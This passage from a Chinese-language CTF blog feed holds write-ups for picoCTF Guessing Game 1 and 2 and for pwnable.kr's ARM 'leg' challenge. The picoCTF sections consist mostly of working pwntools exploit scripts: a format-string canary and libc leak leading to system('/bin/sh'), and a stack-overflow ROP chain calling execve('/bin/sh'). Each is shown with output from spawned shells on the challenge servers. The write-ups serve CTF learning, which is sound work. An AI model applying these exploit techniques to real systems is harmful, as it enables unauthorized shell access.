class="s">"libc223-i386.so"</span><span class="p">)</span> <span class="n">n</span> <span class="o">=</span> <span class="s">'-1775'</span> <span class="n">gdb</span><span class="p">.</span><span class="n">attach</span><span class="p">(</span><span class="n">p</span><span class="p">)</span> <span class="k">def</span> <span class="nf">leakAddressByParaNum</span><span class="p">(</span><span class="n">paraNo</span><span class="p">):</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">'guess?</span><span class="se">\n</span><span class="s">'</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">n</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">'</span><span class="se">\n</span><span class="s">Name? '</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">'%'</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">paraNo</span><span class="p">)</span> <span class="o">+</span> <span class="s">'$p'</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">'Congrats: '</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span> <span class="n">data</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">'</span><span class="se">\n\n</span><span class="s">'</span><span class="p">)</span> <span class="n">data</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="mi">16</span><span class="p">)</span> <span class="k">return</span> <span class="n">data</span> <span class="k">def</span> <span class="nf">leakGOTAddress</span><span class="p">(</span><span class="n">address</span><span class="p">):</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">'guess?</span><span class="se">\n</span><span class="s">'</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">n</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">'</span><span class="se">\n</span><span class="s">Name? '</span><span class="p">)</span> <span class="n">padding</span> <span class="o">=</span> <span class="n">p32</span><span class="p">(</span><span class="n">address</span><span class="p">)</span> <span class="n">padding</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"%7$.4s"</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">padding</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">'Congrats: '</span><span class="p">)</span> <span class="n">data</span> <span class="o">=</span> <span class="nb">hex</span><span class="p">(</span><span class="n">u32</span><span class="p">(</span><span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">()[</span><span class="o">-</span><span class="mi">5</span><span class="p">:</span><span class="o">-</span><span class="mi">1</span><span class="p">]))</span> <span class="k">return</span> <span class="n">data</span> <span class="n">binSh</span> <span class="o">=</span> <span class="mh">0x17bb8f</span> <span class="n">systemLibc</span> <span class="o">=</span> <span class="mh">0x3cd80</span> <span class="n">libcPusts</span> <span class="o">=</span> <span class="mh">0x673d0</span> <span class="n">puts</span> <span class="o">=</span> <span class="mh">0x8049fdc</span> <span class="n">canary</span> <span class="o">=</span> <span class="n">leakAddressByParaNum</span><span class="p">(</span><span class="mi">135</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="s">"canary: "</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">canary</span><span class="p">)))</span> <span class="n">putsAddress</span> <span class="o">=</span> <span class="n">leakGOTAddress</span><span class="p">(</span><span class="n">puts</span><span class="p">)</span> <span class="n">baseAddress</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">putsAddress</span><span class="p">,</span> <span class="mi">16</span><span class="p">)</span> <span class="o">-</span> <span class="n">libcPusts</span> <span class="n">systemAddress</span> <span class="o">=</span> <span class="n">baseAddress</span> <span class="o">+</span> <span class="n">systemLibc</span> <span class="n">binShAddr</span> <span class="o">=</span> <span class="n">baseAddress</span> <span class="o">+</span> <span class="n">binSh</span> <span class="k">print</span><span class="p">(</span><span class="s">"systemAddress: "</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">systemAddress</span><span class="p">))</span> <span class="n">payload</span> <span class="o">=</span> <span class="mi">512</span> <span class="o">*</span> <span class="sa">b</span><span class="s">'A'</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="n">canary</span><span class="p">)</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">p32</span><span class="p">(</span><span class="n">systemAddress</span><span class="p">)</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="n">binShAddr</span><span class="p">)</span> <span class="k">def</span> <span class="nf">exploit</span><span class="p">(</span><span class="n">payload</span><span class="p">):</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">'guess?</span><span class="se">\n</span><span class="s">'</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">n</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">'</span><span class="se">\n</span><span class="s">Name? '</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="n">exploit</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span> </code></pre></div></div> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">[</span>+] Opening connection to jupiter.challenges.picoctf.org on port 15815: Done <span class="o">[</span><span class="k">*</span><span class="o">]</span> <span class="s1">'/home/clot/CTF/GuessGame2/libc-2.27.so'</span> Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled canary: 0xe0b2ae00 systemAddress: 0xf7d7fd80 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Switching to interactive mode Congrats: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA <span class="nv">$ </span><span class="nb">ls </span>flag.txt vuln vuln.c xinet_startup.sh </code></pre></div></div> Tue, 10 Nov 2020 00:00:00 +0000 https://clot.github.io//picoCTF-Guessing-Game-2 https://clot.github.io/picoCTF-Guessing-Game-2 picoCTF - Guessing Game 1 (ROP Chain) <p><a href="https://play.picoctf.org/practice/challenge/90?category=6&amp;page=1">Guessing Game 1</a></p> <p>这题主要涉及到的是ROP chain的使用,由于没做过这类题所以还是学到不少东西,在这里输出一下。</p> <h2 id="code-review">Code Review</h2> <p>题目有三个文件,分别是源码、执行文件和Makefile,可以看到Makefile里的编译指令开启了这些选项<code class="language-plaintext highlighter-rouge">-fno-stack-protector -O0 -no-pie -static</code>,分别是关闭栈保护,无优化,代码位置不会改变,且没有动态库,libc都被静态链接进来了。(<strong>调试时候使用题目发的二进制,不要自己编译,因为最后需要nc到服务器上执行,代码地址可能会有变动(嗨,在这吃了亏)</strong>)</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>clot@ubuntu:~/CTF/GuessGame1<span class="nv">$ </span>./vuln Welcome to my guessing game! What number would you like to guess? 84 Congrats! You win! Your prize is this print statement! New winner! Name? Jin Congrats Jin What number would you like to guess? </code></pre></div></div> <p>通过执行程序和读源码 vuln.c,理解了大致流程:</p> <ol> <li>猜一个随机数+1后的结果</li> <li>正确则会要求输入名字</li> <li>继续猜数字</li> </ol> <p>并发现可利用漏洞位置:</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#define BUFSIZE 100 </span> <span class="kt">void</span> <span class="nf">win</span><span class="p">()</span> <span class="p">{</span> <span class="kt">char</span> <span class="n">winner</span><span class="p">[</span><span class="n">BUFSIZE</span><span class="p">];</span> <span class="n">printf</span><span class="p">(</span><span class="s">"New winner!</span><span class="se">\n</span><span class="s">Name? "</span><span class="p">);</span> <span class="n">fgets</span><span class="p">(</span><span class="n">winner</span><span class="p">,</span> <span class="mi">360</span><span class="p">,</span> <span class="n">stdin</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Congrats %s</span><span class="se">\n\n</span><span class="s">"</span><span class="p">,</span> <span class="n">winner</span><span class="p">);</span> <span class="p">}</span> </code></pre></div></div> <p>这里的<code class="language-plaintext highlighter-rouge">BUFSIZE</code>是100,所以栈上只留了100的空间,然而<code class="language-plaintext highlighter-rouge">fgets</code>可以读取360个字符,这就可以导致栈溢出,修改return地址了。</p> <p>整个程序中没有打印flag的地方,也没有执行<code class="language-plaintext highlighter-rouge">system('/bin/sh')</code>的地方,需要我们自己拼凑<code class="language-plaintext highlighter-rouge">ROPGadget</code>构建。</p> <h3 id="注意这个程序是开启了nxenable的所以栈上的内容是不可执行的也就说shellcode的方法不能用了">注意,这个程序是开启了<code class="language-plaintext highlighter-rouge">NXEnable</code>的,所以栈上的内容是不可执行的,也就说shellcode的方法不能用了</h3> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">[</span><span class="k">*</span><span class="o">]</span> <span class="s1">'/home/clot/CTF/GuessGame1/vuln'</span> Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE <span class="o">(</span>0x400000<span class="o">)</span> </code></pre></div></div> <h2 id="solution">Solution</h2> <h3 id="主要步骤如下">主要步骤如下</h3> <ol> <li>解决伪随机数</li> <li>确认字符串长度及覆盖地址</li> <li>查找到对应的gadget</li> <li>构建<code class="language-plaintext highlighter-rouge">syscall</code> <code class="language-plaintext highlighter-rouge">execve</code>函数及参数(因为找不到<code class="language-plaintext highlighter-rouge">system</code>函数调用)</li> </ol> <p>伪随机数的问题很好解决,猜对后输入名字,长度足够覆盖到ret地址。通过在运行时观察栈的布局,可以看到ret地址(0x0000000000400d01)在120个字符串之后。(0x7fffffffde28 - 0x7fffffffddb0 = 120)</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg&gt; x/40gx <span class="nv">$rsp</span> - 0x70 0x7fffffffdda0: 0x0000000000401a80 0x0000000000400c71 0x7fffffffddb0: 0x4141414141414141 0x000000000049000a 0x7fffffffddc0: 0x00000000006bc0a0 0x00000000006ba018 0x7fffffffddd0: 0x0000000000000000 0x00000000004163b3 0x7fffffffdde0: 0x000000000000001d 0x00000000006ba360 0x7fffffffddf0: 0x00000000004930e8 0x00000000004112c2 0x7fffffffde00: 0x00007fffffffdf88 0x0000000000000054 0x7fffffffde10: 0x0000000000000054 0x0000000100401a80 0x7fffffffde20: 0x00007fffffffde50 0x0000000000400d01 0x7fffffffde30: 0x00007fffffffdf78 0x0000000100401a80 </code></pre></div></div> <p>接下来我们要调用<code class="language-plaintext highlighter-rouge">syscall</code>,其参数和函数地址都通过<code class="language-plaintext highlighter-rouge">ROPGadget</code>来获得。我将gadget全部导入了一个文件中。</p> <div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ROPGadget</span> <span class="nt">--binary</span> vuln <span class="o">&gt;</span> gadget </code></pre></div></div> <p><code class="language-plaintext highlighter-rouge">syscall</code>的参数:</p> <ol> <li> <p><code class="language-plaintext highlighter-rouge">execve</code>调用号:59 (存放到RAX)</p> </li> <li> <p><code class="language-plaintext highlighter-rouge">execve</code>的参数: <code class="language-plaintext highlighter-rouge">/bin/sh, 0, 0</code></p> </li> </ol> <p>所以我们需要的寄存器分别是:</p> <div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>RAX: 59 RDI: 字符串'/bin/sh'的地址 RSI: 0 RDX: 0 </code></pre></div></div> <p>这样,我们要从gadget中找的东西就明了了:</p> <div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x00000000004163f4 : pop rax ; ret 0x0000000000400696 : pop rdi ; ret 0x0000000000410ca3 : pop rsi ; ret 0x000000000044a6b5 : pop rdx ; ret 0x000000000040137c : syscall </code></pre></div></div> <p>问题来了,找不到<code class="language-plaintext highlighter-rouge">/bin/sh</code>这个字符串。这玩意也要我们自己来构建了。 我们能够用的办法就是调用类似<code class="language-plaintext highlighter-rouge">fgets</code>从stdin读取输入的函数,来获取<code class="language-plaintext highlighter-rouge">/bin/sh</code>。</p> <p><code class="language-plaintext highlighter-rouge">fgets</code>函数是找到了,结果这个函数地址是<code class="language-plaintext highlighter-rouge">0x4010a10</code>。这里面有一个<strong>0a</strong>。如果字符串中包含这个字符,传给<code class="language-plaintext highlighter-rouge">fgets</code>后是会被截断的。尝试骗过输入后改地址失败后,换用<code class="language-plaintext highlighter-rouge">read</code>函数了。。</p> <p><code class="language-plaintext highlighter-rouge">read</code>地址为:0x44a6a0,没有会被中断的符号。函数需要三个参数,分别是:</p> <div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>rdi: stdin rsi: &amp;buff rdx: length </code></pre></div></div> <p>这里的buff存放地址需要自己找一个进程中可读可写的地方,在调试时可以通过<code class="language-plaintext highlighter-rouge">vmmap</code>来查看:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg&gt; vmmap LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA 0x400000 0x4b7000 r-xp b7000 0 /home/clot/CTF/GuessGame1/vuln 0x6b7000 0x6bd000 rw-p 6000 b7000 /home/clot/CTF/GuessGame1/vuln 0x6bd000 0x6e1000 rw-p 24000 0 <span class="o">[</span>heap] 0x7ffff7ffb000 0x7ffff7ffd000 r--p 2000 0 <span class="o">[</span>vvar] 0x7ffff7ffd000 0x7ffff7fff000 r-xp 2000 0 <span class="o">[</span>vdso] 0x7ffffffde000 0x7ffffffff000 rw-p 21000 0 <span class="o">[</span>stack] 0xffffffffff600000 0xffffffffff601000 r-xp 1000 0 <span class="o">[</span>vsyscall] </code></pre></div></div> <p>可以看到<code class="language-plaintext highlighter-rouge">0x6b7000 ~ 0x6bd000</code>可读可写,从中选了一个位置<code class="language-plaintext highlighter-rouge">0x6bc500</code>。</p> <h2 id="exploit">Exploit</h2> <p>基本条件都已经满足了,可以写Exploit了。</p> <h3 id="error">ERROR</h3> <p>运行后会发现报错:<strong>got eof while reading in interactive</strong>,google了下发现可能是某些关键的寄存器被改成不合法的了,调试了下发现,<code class="language-plaintext highlighter-rouge">rbp</code>的值被改成了120个A的最后8个改成了<code class="language-plaintext highlighter-rouge">41414141414141..</code>,那么再找一个可读可写相对安全的地址给它 <code class="language-plaintext highlighter-rouge">0x6ba500</code>,用112个A和这个地址拼凑成120个字符。</p> <p>完整的exploit:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">host</span> <span class="o">=</span> <span class="s">'jupiter.challenges.picoctf.org'</span> <span class="n">port</span> <span class="o">=</span> <span class="s">'50581'</span> <span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">port</span><span class="p">)</span> <span class="c1"># Local #elf = ELF('./vuln') #p = elf.process() #gdb.attach(p) </span> <span class="n">p</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">'84'</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span> <span class="n">newRBP</span> <span class="o">=</span> <span class="mh">0x6ba500</span> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s">'A'</span><span class="o">*</span><span class="mi">112</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">newRBP</span><span class="p">)</span> <span class="n">popRAX</span> <span class="o">=</span> <span class="mh">0x4163f4</span> <span class="n">popRDI</span> <span class="o">=</span> <span class="mh">0x400696</span> <span class="n">popRSI</span> <span class="o">=</span> <span class="mh">0x410ca3</span> <span class="n">popRDX</span> <span class="o">=</span> <span class="mh">0x44a6b5</span> <span class="n">syscall</span> <span class="o">=</span> <span class="mh">0x40137c</span> <span class="n">read</span> <span class="o">=</span> <span class="mh">0x44a6a0</span> <span class="n">stdin</span> <span class="o">=</span> <span class="mh">0x6ba580</span> <span class="n">buff</span> <span class="o">=</span> <span class="mh">0x6bc500</span> <span class="c1"># get string '/bin/sh' </span><span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">popRDI</span><span class="p">)</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">popRSI</span><span class="p">)</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">buff</span><span class="p">)</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">popRDX</span><span class="p">)</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mi">7</span><span class="p">)</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">read</span><span class="p">)</span> <span class="c1"># syscall - execve('/bin/sh', 0, 0) </span><span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">popRAX</span><span class="p">)</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mi">59</span><span class="p">)</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">popRDI</span><span class="p">)</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">buff</span><span class="p">)</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">popRSI</span><span class="p">)</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">popRDX</span><span class="p">)</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">syscall</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="n">binSh</span> <span class="o">=</span> <span class="sa">b</span><span class="s">'/bin/sh'</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">binSh</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span> </code></pre></div></div> <p>运行并成功获取到flag:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>clot@ubuntu:~/CTF/GuessGame1<span class="nv">$ </span>python3 vuln_expolit.py <span class="o">[</span>+] Opening connection to jupiter.challenges.picoctf.org on port 50581: Done <span class="o">[</span><span class="k">*</span><span class="o">]</span> Switching to interactive mode Congrats! You win! Your prize is this print statement! New winner! Name? Congrats AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA <span class="nv">$ </span><span class="nb">ls </span>flag.txt vuln vuln.c xinet_startup.sh </code></pre></div></div> Thu, 05 Nov 2020 00:00:00 +0000 https://clot.github.io//picoCTF-Guessing-Game-1-(ROP-Chain) https://clot.github.io/picoCTF-Guessing-Game-1-(ROP-Chain) Reverse Engineering (ARM) <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Download : http://pwnable.kr/bin/leg.c Download : http://pwnable.kr/bin/leg.asm ssh leg@pwnable.kr <span class="nt">-p2222</span> <span class="o">(</span>pw:guest<span class="o">)</span> </code></pre></div></div> <p>这题主要考一些基本的ARM知识,比较简单。</p> <p>下载文件可以看到源码c文件和调试时打印的反编译后的内容。源码文件中有三个关键函数是用汇编写的,只要计算出这三个函数的返回值之和就行。</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">key1</span><span class="p">(){</span> <span class="n">asm</span><span class="p">(</span><span class="s">"mov r3, pc</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="p">}</span> <span class="kt">int</span> <span class="nf">key2</span><span class="p">(){</span> <span class="n">asm</span><span class="p">(</span> <span class="s">"push {r6}</span><span class="se">\n</span><span class="s">"</span> <span class="s">"add r6, pc, $1</span><span class="se">\n</span><span class="s">"</span> <span class="s">"bx r6</span><span class="se">\n</span><span class="s">"</span> <span class="s">".code 16</span><span class="se">\n</span><span class="s">"</span> <span class="s">"mov r3, pc</span><span class="se">\n</span><span class="s">"</span> <span class="s">"add r3, $0x4</span><span class="se">\n</span><span class="s">"</span> <span class="s">"push {r3}</span><span class="se">\n</span><span class="s">"</span> <span class="s">"pop {pc}</span><span class="se">\n</span><span class="s">"</span> <span class="s">".code 32</span><span class="se">\n</span><span class="s">"</span> <span class="s">"pop {r6}</span><span class="se">\n</span><span class="s">"</span> <span class="p">);</span> <span class="p">}</span> <span class="kt">int</span> <span class="nf">key3</span><span class="p">(){</span> <span class="n">asm</span><span class="p">(</span><span class="s">"mov r3, lr</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="p">}</span> </code></pre></div></div> <p>要点:</p> <ol> <li>调试时候显示的pc值是将要执行的pc指令地址,但是如果是指令中从pc读取,则读取的是当前指令的下下条指令。比如:</li> </ol> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x00008cdc &lt;+8&gt;: mov r3, pc 0x00008ce0 &lt;+12&gt;: mov r0, r3 0x00008ce4 &lt;+16&gt;: sub sp, r11, <span class="c">#0</span> </code></pre></div></div> <p>当执行<code class="language-plaintext highlighter-rouge">0x00008cdc</code>语句时,pc的内容实际是<code class="language-plaintext highlighter-rouge">0x00008ce4</code>,而非当前的<code class="language-plaintext highlighter-rouge">0x00008cdc</code>。</p> <ol> <li>这类是跳入THUMB指令的标识,寄存器值末尾置为1,用<code class="language-plaintext highlighter-rouge">BX</code>跳转,切换指令模式</li> </ol> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="mh">0x00008cfc</span> <span class="o">&lt;+</span><span class="mi">12</span><span class="o">&gt;:</span> <span class="n">add</span> <span class="n">r6</span><span class="p">,</span> <span class="n">pc</span><span class="p">,</span> <span class="err">#</span><span class="mi">1</span> <span class="mh">0x00008d00</span> <span class="o">&lt;+</span><span class="mi">16</span><span class="o">&gt;:</span> <span class="n">bx</span> <span class="n">r6</span> </code></pre></div></div> <ol> <li><code class="language-plaintext highlighter-rouge">r11</code>是 fp,类似于<code class="language-plaintext highlighter-rouge">ebp</code>, <code class="language-plaintext highlighter-rouge">lr</code>指向ret的地址,也就是调用函数返回后执行的下一条指令的地址。这三个函数的返回值(r0)都只是涉及到pc值的读取,so ez.</li> </ol> Mon, 26 Oct 2020 00:00:00 +0000 https://clot.github.io//Reverse-Engineering-(ARM) https://clot.github.io/Reverse-Engineering-(ARM)